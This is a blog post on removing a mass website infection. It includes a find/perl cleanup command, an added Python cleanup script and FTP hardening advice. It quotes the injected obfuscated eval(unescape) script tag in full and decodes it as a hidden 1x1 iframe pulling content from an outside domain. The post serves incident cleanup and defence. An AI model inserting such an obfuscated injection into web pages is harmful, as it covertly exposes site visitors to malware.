Removing uy7gdr5332rkmn malware

Recently I got a mail from my hosting provider that a few of my sites were distributing malware. I connected to my server and found that all the index files had the following script tag appended to them:

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

The decoded version of the code is:
document.write('<iframe src="http://sedpoo.com/?5589921" width=1 height=1></iframe>');
In other words, every infected page silently loads a 1x1 pixel iframe from that domain.

Removing the code manually was impossible, since a number of sites were affected and a few of them had directory hierarchies several levels deep.

Once again, Unix shell commands came to my rescue. The following command removes the script from .html, .htm and .php files. If your sites use other extensions, such as .tpl, modify the command accordingly:

find . \( -name "*.html" -o -name "*.htm" -o -name "*.php" \) -print0 | xargs -0 perl -p -i -e "s#<script>eval\(unescape\('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'\)\);</script><\!-- uy7gdr5332rkmn -->##"

Make sure you run the above command from your account root directory (which is usually your FTP user’s home directory), because the malware affects the default error documents too, and those are sometimes located outside the document root (in Plesk the document root is ~/httpdocs and the error documents are located in ~/error_docs).
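The same cleanup as an added Python example (not the post's own tooling): it anchors on the marker comment so any eval(unescape('...')) payload in front of it is caught, not just the one blob quoted above, shows what each payload decodes to, backs up every file it rewrites, and only touches .html/.htm/.php. The sample pages, the httpdocs/error_docs layout and the .bak suffix are constructed for the demo.

```python
import re
import shutil
import tempfile
from pathlib import Path
from urllib.parse import unquote_to_bytes

# Anchor on the marker comment the injection always ends with, so any percent-encoded
# payload inside eval(unescape('...')) is matched, not only the one blob quoted above.
INJECTION_RE = re.compile(
    rb"<script>eval\(unescape\('(?P<payload>[^']*)'\)\);</script><!-- uy7gdr5332rkmn -->")
EXTENSIONS = (".html", ".htm", ".php")

# Constructed sample page carrying the exact tag quoted in the post.
PAYLOAD = ("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22"
           "%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20"
           "%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29")
INJECTED_TAG = "<script>eval(unescape('" + PAYLOAD + "'));</script><!-- uy7gdr5332rkmn -->"
SAMPLE_PAGE = "<html><body><h1>Hi</h1></body></html>\n" + INJECTED_TAG

def decoded_injections(data: bytes) -> list:
    """What each injected eval(unescape(...)) would execute, decoded like JS unescape()."""
    return [unquote_to_bytes(m.group("payload")).decode("latin-1") for m in INJECTION_RE.finditer(data)]

def clean_bytes(data: bytes):
    """Return (cleaned_data, number_of_injections_removed)."""
    return INJECTION_RE.subn(b"", data)

def clean_tree(root, backup_suffix=".bak") -> dict:
    """Clean every .html/.htm/.php below root in place; returns {relative_path: removed}."""
    changed = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        cleaned, n = clean_bytes(path.read_bytes())
        if n:
            shutil.copy2(path, str(path) + backup_suffix)  # keep the infected copy as evidence
            path.write_bytes(cleaned)
            changed[str(path.relative_to(root))] = n
    return changed

def demo() -> dict:
    """Build a throwaway account tree (httpdocs plus error_docs, as in Plesk) and clean it."""
    root = Path(tempfile.mkdtemp())
    for rel, body in [("httpdocs/index.php", SAMPLE_PAGE), ("error_docs/not_found.html", SAMPLE_PAGE),
                      ("httpdocs/css/site.css", INJECTED_TAG), ("httpdocs/clean.html", "<p>ok</p>")]:
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)  # the .css copy has a non-matching extension and stays untouched
    return clean_tree(root)
```

Run demo() from the account root equivalent; the returned dict lists exactly which files were rewritten and how many injections each held, which is the list worth keeping alongside the .bak copies.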

Please keep in mind that your duty doesn’t end with disinfection. The above command only removes the malicious code from the pages; it will not prevent the files from getting infected again. Most of the time the malware is uploaded via compromised FTP accounts (stolen password / brute-forced account). Make sure you change your FTP password. If possible, set up passwordless (SSH key-based) login via SFTP.